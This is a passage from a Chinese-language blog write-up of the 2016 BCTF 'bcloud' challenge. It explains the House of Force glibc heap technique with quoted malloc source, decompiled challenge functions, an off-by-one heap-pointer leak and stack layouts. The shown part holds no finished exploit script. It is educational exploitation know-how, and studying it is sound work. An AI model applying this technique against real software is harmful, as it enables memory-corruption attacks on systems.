<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="House of Force,">










<meta name="description" content="0x00 House of ForceHouse Of Force &amp;#x662F;&amp;#x4E00;&amp;#x79CD;&amp;#x5806;&amp;#x5229;&amp;#x7528;&amp;#x65B9;&amp;#x6CD5;,&amp;#x901A;&amp;#x8FC7;&amp;#x6EA2;&amp;#x51FA;&amp;#x7684;&amp;#x65B9;&amp;#x5F0F;&amp;#x5C06;topchunk&amp;#x7684;size&amp;#x4FEE;&amp;#x6539;&amp;">
<meta name="keywords" content="House of Force">
<meta property="og:type" content="article">
<meta property="og:title" content="2016-BCTF-bcloud-[Heap of Force]">
<meta property="og:url" content="http://yoursite.com/2019/03/20/2016-BCTF-bcloud-[Heap of Force]/index.html">
<meta property="og:site_name" content="Po1lux&#39;s Diary">
<meta property="og:description" content="0x00 House of ForceHouse Of Force &amp;#x662F;&amp;#x4E00;&amp;#x79CD;&amp;#x5806;&amp;#x5229;&amp;#x7528;&amp;#x65B9;&amp;#x6CD5;,&amp;#x901A;&amp;#x8FC7;&amp;#x6EA2;&amp;#x51FA;&amp;#x7684;&amp;#x65B9;&amp;#x5F0F;&amp;#x5C06;topchunk&amp;#x7684;size&amp;#x4FEE;&amp;#x6539;&amp;">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-03-24T14:41:51.600Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2016-BCTF-bcloud-[Heap of Force]">
<meta name="twitter:description" content="0x00 House of ForceHouse Of Force &amp;#x662F;&amp;#x4E00;&amp;#x79CD;&amp;#x5806;&amp;#x5229;&amp;#x7528;&amp;#x65B9;&amp;#x6CD5;,&amp;#x901A;&amp;#x8FC7;&amp;#x6EA2;&amp;#x51FA;&amp;#x7684;&amp;#x65B9;&amp;#x5F0F;&amp;#x5C06;topchunk&amp;#x7684;size&amp;#x4FEE;&amp;#x6539;&amp;">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/03/20/2016-BCTF-bcloud-[Heap of Force]/">






  <title>2016-BCTF-bcloud-[Heap of Force] | Po1lux's Diary</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Po1lux's Diary</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/20/2016-BCTF-bcloud-[Heap of Force]/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Po1lux">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/IMG.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Po1lux's Diary">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2016-BCTF-bcloud-[Heap of Force]</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-20T23:19:07+08:00">
                2019-03-20
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/03/20/2016-BCTF-bcloud-[Heap of Force]/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2019/03/20/2016-BCTF-bcloud-[Heap of Force]/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2019/03/20/2016-BCTF-bcloud-[Heap of Force]/" class="leancloud_visitors" data-flag-title="2016-BCTF-bcloud-[Heap of Force]">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="0x00-House-of-Force"><a href="#0x00-House-of-Force" class="headerlink" title="0x00 House of Force"></a>0x00 House of Force</h3><p>House Of Force &#x662F;&#x4E00;&#x79CD;&#x5806;&#x5229;&#x7528;&#x65B9;&#x6CD5;,&#x901A;&#x8FC7;&#x6EA2;&#x51FA;&#x7684;&#x65B9;&#x5F0F;&#x5C06;topchunk&#x7684;size&#x4FEE;&#x6539;&#x6210;&#x8DB3;&#x591F;&#x5927;&#xFF0C;&#x5728;&#x901A;&#x8FC7;&#x7533;&#x8BF7;&#x4E00;&#x5B9A;&#x5927;&#x5C0F;&#x7684;chunk&#xFF0C;&#x5C06;topchunk&#x7684;&#x5730;&#x5740;&#x53D8;&#x6210;&#x6211;&#x4EEC;&#x6307;&#x5B9A;&#x7684;&#x5730;&#x5740;&#xFF0C;&#x6BD4;&#x5982;&#x67D0;&#x4E9B;&#x51FD;&#x6570;&#x7684;got&#x5730;&#x5740;&#xFF0C;&#x6B64;&#x65F6;&#x518D;&#x7533;&#x8BF7;&#x4E00;&#x4E2A;chunk&#xFF0C;&#x90A3;&#x4E48;&#x5C31;&#x53EF;&#x4EE5;&#x5BF9;&#x8BE5;got&#x6307;&#x9488;&#x7684;&#x5185;&#x5BB9;&#x8FDB;&#x884C;&#x4FEE;&#x6539;&#x548C;&#x5229;&#x7528;&#x3002;</p>
<p>&#x5F53;&#x7528;&#x6237;&#x7533;&#x8BF7;chunk&#x65F6;&#xFF0C;&#x6240;&#x6709;&#x7A7A;&#x95F2;&#x5757;&#x5747;&#x4E0D;&#x80FD;&#x6EE1;&#x8DB3;&#x5176;&#x5927;&#x5C0F;&#x65F6;&#xFF0C;glibc&#x5C31;&#x4F1A;&#x4ECE;topchunk&#x4E2D;&#x5206;&#x5272;&#x51FA;&#x76F8;&#x5E94;&#x5927;&#x5C0F;&#x7684;chunk&#x3002;&#x5E76;&#x4E0D;&#x662F;&#x6240;&#x6709;&#x7A7A;&#x95F2;&#x5757;&#x6EE1;&#x8DB3;&#x4E0D;&#x4E86;&#x7684;chunk&#x90FD;&#x4F1A;&#x4ECE;topchunk&#x4E2D;&#x5206;&#x5272;&#xFF0C;glibc&#x5BF9;&#x6B64;&#x6709;&#x4E00;&#x4E9B;&#x5224;&#x65AD;&#x3002;<br>&#x5728;glibc&#x6E90;&#x7801;<code>_int_malloc</code>&#x51FD;&#x6570;&#x4E2D;&#xFF1A;<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//&#x83B7;&#x53D6;topchunk&#x6307;&#x9488;&#xFF0C;&#x83B7;&#x53D6;topchunk&#x7684;&#x5927;&#x5C0F;</span></span><br><span class="line">victim = av-&gt;top;</span><br><span class="line">size   = chunksize(victim);</span><br><span class="line"><span class="comment">//&#x5982;&#x679C;&#x5728;&#x5206;&#x5272;&#x4E4B;&#x540E;&#xFF0C;topchunk&#x7684;&#x5927;&#x5C0F;&#x5927;&#x4E8E;MINSIZE&#xFF0C;&#x90A3;&#x4E48;&#x5C31;&#x53EF;&#x4EE5;&#x8FDB;&#x884C;&#x5206;&#x5272;&#x3002;&#x8FD9;&#x91CC;&#x8FD8;&#x9700;&#x8981;&#x52A0;&#x4E0A;MINSIZE&#x662F;&#x7531;&#x4E8E;topchunk&#x5FC5;&#x987B;&#x7559;&#x4E0B;&#x6765;&#x7528;&#x4F5C;fencepost&#xFF0C;&#x4EE5;&#x5206;&#x9694;&#x5806;&#x548C;&#x5176;&#x4ED6;&#x7A7A;&#x95F4;&#x3002;</span></span><br><span class="line"><span class="keyword">if</span> ((<span class="keyword">unsigned</span> <span class="keyword">long</span>) (size) &gt;= (<span class="keyword">unsigned</span> <span class="keyword">long</span>) (nb + MINSIZE))</span><br><span class="line">{</span><br><span class="line">    remainder_size = size - nb;</span><br><span class="line">    remainder      = chunk_at_offset(victim, nb);</span><br><span class="line">    <span class="comment">//&#x66F4;&#x65B0;topchunk</span></span><br><span class="line">    av-&gt;top        = remainder;</span><br><span class="line">    set_head(victim, nb | PREV_INUSE |</span><br><span class="line">            (av != &amp;main_arena ? NON_MAIN_ARENA : <span class="number">0</span>));</span><br><span class="line">    set_head(remainder, remainder_size | PREV_INUSE);</span><br><span class="line"></span><br><span class="line">    check_malloced_chunk(av, victim, nb);</span><br><span class="line">    <span class="keyword">void</span> *p = chunk2mem(victim);</span><br><span class="line">    alloc_perturb(p, bytes);</span><br><span class="line">    <span class="keyword">return</span> p;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>&#x6E90;&#x7801;&#x4E2D;&#x6709;&#x4E00;&#x6BB5;&#x6CE8;&#x91CA;</p>
<blockquote>
<p>We require that av-&gt;top always exists (i.e., has size &gt;=MINSIZE) after initialization, so if it would otherwise beexhausted by current request, it is replenished. (The mainreason for ensuring it exists is that we may need MINSIZE spaceto put in fenceposts in sysmalloc.)</p>
</blockquote>
<p>&#x5982;&#x679C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x628A;topchunk&#x7684;size&#x7BE1;&#x6539;&#x6210;&#x5F88;&#x5927;&#x7684;&#x503C;&#xFF08;&#x6BD4;&#x5982;&#x5728;x86&#x4E0B;&#x7BE1;&#x6539;&#x4E3A;0xffffffff&#xFF09;&#x5C31;&#x53EF;&#x4EE5;&#x5F88;&#x5BB9;&#x6613;&#x901A;&#x8FC7;&#x8FD9;&#x4E2A;&#x9A8C;&#x8BC1;&#x3002;<br>&#x4E4B;&#x540E;topchunk&#x6307;&#x9488;&#x4F1A;&#x66F4;&#x65B0;&#xFF0C;&#x4E0B;&#x6B21;&#x7533;&#x8BF7;chunk&#x65F6;&#xFF0C;&#x5C31;&#x4F1A;&#x628A;&#x5730;&#x5740;&#x5206;&#x914D;&#x5230;&#x66F4;&#x65B0;&#x540E;&#x7684;topchunk&#x7684;&#x5730;&#x5740;&#x4E0A;&#xFF0C;&#x7528;&#x6237;&#x5982;&#x679C;&#x901A;&#x8FC7;&#x8BE5;&#x65B9;&#x5F0F;&#x63A7;&#x5236;&#x4E86;&#x6307;&#x9488;&#xFF0C;&#x5C31;&#x53EF;&#x4EE5;&#x5B9E;&#x73B0;&#x4EFB;&#x610F;&#x5730;&#x5740;&#x7684;&#x8BFB;&#x548C;&#x5199;&#x3002;</p>
<h3 id="2016-BCTF-bcloud"><a href="#2016-BCTF-bcloud" class="headerlink" title="2016-BCTF-bcloud"></a>2016-BCTF-bcloud</h3><p>&#x7A0B;&#x5E8F;&#x7684;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#xFF1A;<br><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">Canary</span>                        <span class="string">:</span> <span class="literal">Yes</span></span><br><span class="line"><span class="string">NX</span>                            <span class="string">:</span> <span class="literal">Yes</span></span><br><span class="line"><span class="string">PIE</span>                           <span class="string">:</span> <span class="literal">No</span></span><br><span class="line"><span class="string">Fortify</span>                       <span class="string">:</span> <span class="literal">No</span></span><br><span class="line"><span class="string">RelRO</span>                         <span class="string">:</span> <span class="string">Partial</span></span><br></pre></td></tr></table></figure></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">./bcloud</span><br><span class="line">Input your name:</span><br><span class="line">aa</span><br><span class="line">Hey aa! Welcome to BCTF CLOUD NOTE MANAGE SYSTEM!</span><br><span class="line">Now let&apos;s <span class="built_in">set</span> synchronization options.</span><br><span class="line">Org:</span><br><span class="line">bb</span><br><span class="line">Host:</span><br><span class="line">cc</span><br><span class="line">OKay! Enjoy:)</span><br><span class="line"><span class="number">1.</span>New note</span><br><span class="line"><span class="number">2.</span>Show note</span><br><span class="line"><span class="number">3.</span>Edit note</span><br><span class="line"><span class="number">4.</span>Delete note</span><br><span class="line"><span class="number">5.</span>Syn</span><br><span class="line"><span class="number">6.</span>Quit</span><br><span class="line">option---&gt;&gt;</span><br></pre></td></tr></table></figure>
<h3 id="0x02-&#x5E8F;&#x53CA;&#x5229;&#x7528;&#x5206;&#x6790;"><a href="#0x02-&#x5E8F;&#x53CA;&#x5229;&#x7528;&#x5206;&#x6790;" class="headerlink" title="0x02 &#x5E8F;&#x53CA;&#x5229;&#x7528;&#x5206;&#x6790;"></a>0x02 &#x5E8F;&#x53CA;&#x5229;&#x7528;&#x5206;&#x6790;</h3><h4 id="1-&#x6CC4;&#x9732;&#x5806;&#x6307;&#x9488;"><a href="#1-&#x6CC4;&#x9732;&#x5806;&#x6307;&#x9488;" class="headerlink" title="1.&#x6CC4;&#x9732;&#x5806;&#x6307;&#x9488;"></a>1.&#x6CC4;&#x9732;&#x5806;&#x6307;&#x9488;</h4><p>&#x7A0B;&#x5E8F;&#x6709;&#x4E00;&#x4E2A;&#x81EA;&#x5B9A;&#x4E49;&#x7684;read&#x51FD;&#x6570;&#xFF0C;&#x5176;&#x529F;&#x80FD;&#x5C31;&#x662F;&#x5C06;&#x7528;&#x6237;&#x7684;&#x8F93;&#x5165;&#x4E00;&#x4E2A;&#x5B57;&#x8282;&#x4E00;&#x4E2A;&#x5B57;&#x8282;&#x5199;&#x5165;&#x7B2C;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#x6307;&#x5B9A;&#x7684;&#x5730;&#x5740;&#xFF0C;&#x7A0B;&#x5E8F;&#x6709;&#x5F88;&#x591A;&#x5730;&#x65B9;&#x8C03;&#x7528;&#x4E86;&#x8BE5;&#x51FD;&#x6570;&#xFF0C;&#x6BD4;&#x5982;&#x5728;&#x7A0B;&#x5E8F;&#x521D;&#x59CB;&#x5316;&#x65F6;&#x8F93;&#x5165;name&#x3001;Org&#x3001;Host&#x65F6;&#x5C31;&#x8C03;&#x7528;&#x4E86;&#x8BE5;&#x51FD;&#x6570;&#x3002;<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">sub_804868D</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">int</span> a2, <span class="keyword">char</span> a3)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [esp+1Bh] [ebp-Dh]</span></span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [esp+1Ch] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; a2; ++i )</span><br><span class="line">  {</span><br><span class="line">    <span class="keyword">if</span> ( read(<span class="number">0</span>, &amp;buf, <span class="number">1u</span>) &lt;= <span class="number">0</span> )</span><br><span class="line">      <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    <span class="keyword">if</span> ( buf == a3 )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    *(_BYTE *)(a1 + i) = buf;</span><br><span class="line">  }</span><br><span class="line">  *(_BYTE *)(i + a1) = <span class="number">0</span>;   <span class="comment">//* off by one</span></span><br><span class="line">  <span class="keyword">return</span> i;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>&#x5728;&#x8F93;&#x5165;name&#x65F6;&#xFF0C;&#x7531;&#x4E8E;&#x5185;&#x5B58;&#x5E03;&#x5C40;&#x6709;&#x95EE;&#x9898;&#xFF0C;&#x56E0;&#x6B64;&#x4E0A;&#x8FF0;&#x81EA;&#x5B9A;&#x4E49;&#x7684;read&#x51FD;&#x6570;*&#x5904;&#x5C31;&#x51FA;&#x73B0;&#x4E86;off by one &#x6F0F;&#x6D1E;<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> <span class="keyword">int</span> <span class="title">input_name</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [esp+1Ch] [ebp-5Ch]</span></span><br><span class="line">  <span class="keyword">char</span> *v2; <span class="comment">// [esp+5Ch] [ebp-1Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v3; <span class="comment">// [esp+6Ch] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  <span class="built_in">memset</span>(&amp;s, <span class="number">0</span>, <span class="number">0x50</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Input your name:&quot;</span>);</span><br><span class="line">  iread((<span class="keyword">int</span>)&amp;s, <span class="number">64</span>, <span class="number">10</span>);</span><br><span class="line">  v2 = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>(<span class="number">0x40</span>u);</span><br><span class="line">  dword_804B0CC = (<span class="keyword">int</span>)v2;</span><br><span class="line">  <span class="built_in">strcpy</span>(v2, &amp;s);</span><br><span class="line">  sub_8048779(v2);</span><br><span class="line">  <span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v3;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>&#x4ECE;&#x4E0A;&#x9762;&#x7684;&#x6CE8;&#x91CA;&#x53EF;&#x4EE5;&#x77E5;&#x9053;s&#x548C;v2&#x5728;&#x6808;&#x4E2D;&#x7684;&#x4F4D;&#x7F6E;<br><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="code">+------------+</span></span><br><span class="line">|    v2      |  # ebp-0x1c</span><br><span class="line"><span class="code">+------------+</span></span><br><span class="line">|    ...     |  # &#x4E2D;&#x95F4;&#x6709;63&#x4E2A;&#x5355;&#x4F4D;&#x7684;&#x7A7A;&#x95F4;</span><br><span class="line"><span class="code">+------------+</span></span><br><span class="line">|     s      |  # ebp-0x5c</span><br><span class="line"><span class="code">+------------+</span></span><br></pre></td></tr></table></figure></p>
<p>&#x6240;&#x4EE5;&#x5F53;name&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x957F;&#x5EA6;&#x4E3A;64&#x65F6;&#xFF0C;iread&#x51FD;&#x6570;&#x4F1A;&#x5728;&#x5176;&#x540E;&#x52A0;&#x4E0A;&#x2019;\x00&#x2019;&#x4F5C;&#x4E3A;&#x5B57;&#x7B26;&#x4E32;&#x622A;&#x65AD;&#x7B26;&#xFF0C;&#x4F46;&#x662F;&#x8FD9;&#x4E2A;&#x4F4D;&#x7F6E;&#x5728;input_name&#x51FD;&#x6570;&#x4E2D;&#x5B58;&#x653E;&#x7684;&#x662F;v2&#x7684;&#x5730;&#x5740;&#xFF0C;v2&#x662F;&#x5806;&#x6307;&#x9488;&#x3002;&#x56E0;&#x4E3A;strcpy&#x51FD;&#x6570;&#x590D;&#x5236;&#x5185;&#x5B58;&#x4E2D;&#x7684;&#x6570;&#x636E;&#x662F;&#x4EE5;&#x2019;\x00&#x2019;&#x4E3A;&#x622A;&#x65AD;&#x7B26;&#xFF0C;&#x56E0;&#x6B64;&#x5F53;name&#x4E3A;64&#x5B57;&#x8282;&#x65F6;&#xFF0C;&#x7A0B;&#x5E8F;&#x4F1A;&#x5C06;v2&#x7684;&#x5730;&#x5740;&#x6253;&#x5370;&#x51FA;&#x6765;&#xFF0C;&#x5728;&#x6B64;&#x5904;<code>Hey aa! Welcome</code>&#x6CC4;&#x9732;&#x5806;&#x6307;&#x9488;&#x3002;</p>
<h4 id="2-&#x4FEE;&#x6539;topchunk&#x7684;&#x5927;&#x5C0F;&#x4E3A;0xffffffff"><a href="#2-&#x4FEE;&#x6539;topchunk&#x7684;&#x5927;&#x5C0F;&#x4E3A;0xffffffff" class="headerlink" title="2.&#x4FEE;&#x6539;topchunk&#x7684;&#x5927;&#x5C0F;&#x4E3A;0xffffffff"></a>2.&#x4FEE;&#x6539;topchunk&#x7684;&#x5927;&#x5C0F;&#x4E3A;0xffffffff</h4><p>&#x5728;&#x8F93;&#x5165;Org&#x5904;&#xFF0C;&#x4E5F;&#x5B58;&#x5728;&#x540C;&#x6837;&#x7684;&#x95EE;&#x9898;<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> <span class="keyword">int</span> <span class="title">input_org_host</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [esp+1Ch] [ebp-9Ch]</span></span><br><span class="line">  <span class="keyword">char</span> *v2; <span class="comment">// [esp+5Ch] [ebp-5Ch]</span></span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// [esp+60h] [ebp-58h]</span></span><br><span class="line">  <span class="keyword">char</span> *v4; <span class="comment">// [esp+A4h] [ebp-14h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v5; <span class="comment">// [esp+ACh] [ebp-Ch]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  <span class="built_in">memset</span>(&amp;s, <span class="number">0</span>, <span class="number">0x90</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Org:&quot;</span>);</span><br><span class="line">  iread((<span class="keyword">int</span>)&amp;s, <span class="number">64</span>, <span class="number">10</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Host:&quot;</span>);</span><br><span class="line">  iread((<span class="keyword">int</span>)&amp;v3, <span class="number">64</span>, <span class="number">10</span>);</span><br><span class="line">  v4 = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>(<span class="number">0x40</span>u);</span><br><span class="line">  v2 = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>(<span class="number">0x40</span>u);</span><br><span class="line">  dword_804B0C8 = (<span class="keyword">int</span>)v2;</span><br><span class="line">  dword_804B148 = (<span class="keyword">int</span>)v4;</span><br><span class="line">  <span class="built_in">strcpy</span>(v4, (<span class="keyword">const</span> <span class="keyword">char</span> *)&amp;v3);</span><br><span class="line">  <span class="built_in">strcpy</span>(v2, &amp;s);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;OKay! Enjoy:)&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v5;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<p>&#x4ECE;&#x4E0A;&#x9762;&#x7684;&#x6CE8;&#x91CA;&#x53EF;&#x4EE5;&#x77E5;&#x9053;&#x4E00;&#x4E9B;&#x53D8;&#x91CF;&#x7684;&#x4F4D;&#x7F6E;<br><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="code">+------------+</span></span><br><span class="line">|    v4      |  # ebp-0x14</span><br><span class="line"><span class="code">+------------+</span></span><br><span class="line">|    ...     |  </span><br><span class="line"><span class="code">+------------+</span></span><br><span class="line">|  Host(v3)  |  # ebp-0x58</span><br><span class="line"><span class="code">+------------+</span></span><br><span class="line">|     v2     |  # ebp-0x5c</span><br><span class="line"><span class="code">+------------+</span></span><br><span class="line">|    ...     |  # &#x4E2D;&#x95F4;&#x6709;63&#x4E2A;&#x5355;&#x4F4D;&#x7684;&#x7A7A;&#x95F4;</span><br><span class="line"><span class="code">+------------+</span></span><br><span class="line">|   Org(s)   |  # ebp-0x9c</span><br><span class="line"><span class="code">+------------+</span></span><br></pre></td></tr></table></figure></p>
